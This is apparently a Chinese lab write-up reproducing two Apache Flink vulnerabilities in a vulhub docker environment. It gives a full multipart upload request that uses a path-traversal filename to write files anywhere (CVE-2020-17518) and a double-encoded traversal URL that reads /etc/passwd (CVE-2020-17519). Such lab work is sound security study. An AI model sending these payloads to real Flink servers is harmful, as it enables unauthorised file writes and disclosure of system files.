vulhub漏洞复现十六

vulhub漏洞复现十六,第1张

vulhub漏洞复现十六

前言

Apache Flink是一个框架和分布式处理引擎,用于对无界和有界数据流进行有状态计算。Flink设计为在所有常见的集群环境中运行,以内存速度和任何规模执行计算。

一、 CVE-2020-17518_Apache Flink Upload Path Traversal

漏洞原理

Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入本地文件系统上的任意位置。

环境搭建

靶场:192.168.4.10_ubuntu

Execute following commands to start a Apache Flink jobmanager 1.11.2:

#docker-compose up -d

After the Apache Flink is started, visit `http://your-ip:8081` to view the homepage.

漏洞利用

Use following request to upload a file to `/tmp/success`:

```

POST /jars/upload HTTP/1.1

Host: localhost:8081

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Connection: close

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y

Content-Length: 187

------WebKitFormBoundaryoZ8meKnrrso89R6Y

Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"

success

------WebKitFormBoundaryoZ8meKnrrso89R6Y--

```

 

成功写入

 

二、 CVE-2020-17519_Apache Flink `jobmanager/logs` Path Traversal

漏洞原理

Apache Flink 1.11.0(以及1.11.1和1.11.2中发布的)中引入的一项更改允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统中的任何文件。

漏洞环境

Execute following commands to start a Apache Flink jobmanager 1.11.2:

#docker-compose up -d

漏洞利用

Disclose the `/etc/passwd`:

```

http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

```

 

欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/zaji/5715999.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-17
下一篇 2022-12-17

发表评论

登录后才能评论

评论列表(0条)

保存